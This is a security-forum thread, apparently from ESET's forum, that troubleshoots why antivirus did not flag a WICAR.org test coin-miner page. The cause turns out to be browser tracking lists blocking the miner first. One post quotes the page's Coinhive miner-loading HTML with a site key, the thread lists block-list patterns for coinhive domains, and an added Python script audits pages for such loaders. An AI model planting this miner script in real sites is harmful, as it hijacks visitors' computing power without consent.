itman

Eset Not Detecting Test Coin Miner

Posted (edited)

http://malware.wicar.org/data/js_crypto_miner.html

This one actually does coin mining.

Also doesn't look good that SmartScreen detected it. At least now I can say I found something that SmartScreen detects that Eset doesn't.🤭

Edited by itman


Just to be sure, I disabled SmartScreen in Edge and still no alert from Eset. Sure the same will happen in IE11. Eset always alerts prior to SmartScreen.

Running EIS ver. 11.2.42 with default settings as far as Internet Protection goes.


Also, don't believe this is Coin Hive based since I have the following in an Eset URL block list and those didn't trigger either:

*.coinhive.com/*
*.coin-hive.com/*


Not sure what the problem could be. No problems here:

image.png

Posted (edited)

I don't get it either. Below is the code it is executing. The block list should have detected it regardless:

Quote

 

<html>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>
    var miner = new CoinHive.Anonymous('VrqhGymiL9VzA7DO9YcZNzOVyNkY6tVS', {throttle: 0.3});
    // Only start on non-mobile devices and if not opted-out
    // in the last 14400 seconds (4 hours):
    //if (!miner.isMobile() && !miner.didOptOut(14400)) { miner.start();
    //}
</script>
</html>

 

If I click on the coinhive link, the block list detects it.

And all PUA detection settings are enabled.

Edited by itman

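An added example (not posted by anyone in this thread, and not ESET's or any browser's own matching logic): a static check of a page's script tags against the hosts named in the block list above, which shows what a test page references regardless of which filter in the browser stack blocks the request first. The sample page, the `audit` and `host_matches` names, and the rule that a blocked domain also covers its subdomains are assumptions for illustration.

```python
from html.parser import HTMLParser
from urllib.parse import urlparse

# Hosts taken from the block-list entries quoted in the thread.
MINER_HOSTS = ("coinhive.com", "coin-hive.com")

# Constructed sample modelled on the quoted snippet; the site key is a placeholder.
SAMPLE_PAGE = """<html>
<script src="https://coinhive.com/lib/coinhive.min.js"></script>
<script>var miner = new CoinHive.Anonymous('SITE_KEY_PLACEHOLDER', {throttle: 0.3});</script>
<script src="https://cdn.example.org/app.js"></script>
</html>"""


def host_matches(host, blocked=MINER_HOSTS):
    """True for a blocked domain itself or any subdomain of it (assumed rule)."""
    host = (host or "").lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in blocked)


class ScriptAudit(HTMLParser):
    """Collects external script URLs and inline script bodies."""

    def __init__(self):
        super().__init__()
        self.external, self.inline, self._in_script = [], [], False

    def handle_starttag(self, tag, attrs):
        if tag == "script":
            src = dict(attrs).get("src")
            if src:
                self.external.append(src)
            self._in_script = True

    def handle_endtag(self, tag):
        if tag == "script":
            self._in_script = False

    def handle_data(self, data):
        if self._in_script and data.strip():
            self.inline.append(data)


def audit(html):
    """Return (kind, evidence) pairs for miner loaders referenced by the page."""
    parser = ScriptAudit()
    parser.feed(html)
    parser.close()
    hits = [("script-src", s) for s in parser.external
            if host_matches(urlparse(s).hostname)]
    hits += [("inline-api", "CoinHive.Anonymous") for body in parser.inline
             if "CoinHive.Anonymous" in body]
    return hits
```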

@Marcos, it gets weirder.

I am using Easylist Privacy tpl in IE11. Additionally, in Edge, I am using AdGuard extension with both Easylist Privacy and NoCoin lists. All these will detect Coinhive. None of them triggered in this Wicar.org coin miner test.

So I went to the AMTSO Desktop Test site and ran the PUA test. Eset performed as expected and alerted on PUA detection. So at this point, I am at a loss as to why this is happening.

Also I am running on Win 10 x(64) 1803.

Looks like Wicar.org copied the code straight from here: https://medium.com/@bitcoinloverr/100-latest-coinhive-javascript-mining-trick-monero-b525f38ce545


Mine detects it, but I have to disable my adblock plugin to see ESET's prompt because my adblock will block the mining script before ESET kicks in.

Posted (edited)

- Posting edited to reflect what the issue really was -

Indeed, further testing confirmed tracking protection lists used in Edge and IE11 were intercepting and blocking the connection to coinhive.com prior to Eset having a chance to do likewise. 

As far as the SmartScreen alert, it is a bogus one as most browser based SmartScreen alerts are. All SmartScreen is blocking is access to the wicar.org coin miner test web site; not any actual coin mining activity occurring there.

Edited by itman

Posted (edited)

Will also add that I found an obscure European coinhive test web site that SmartScreen does not detect to test Eset's coin miner protection.


Edited by itman
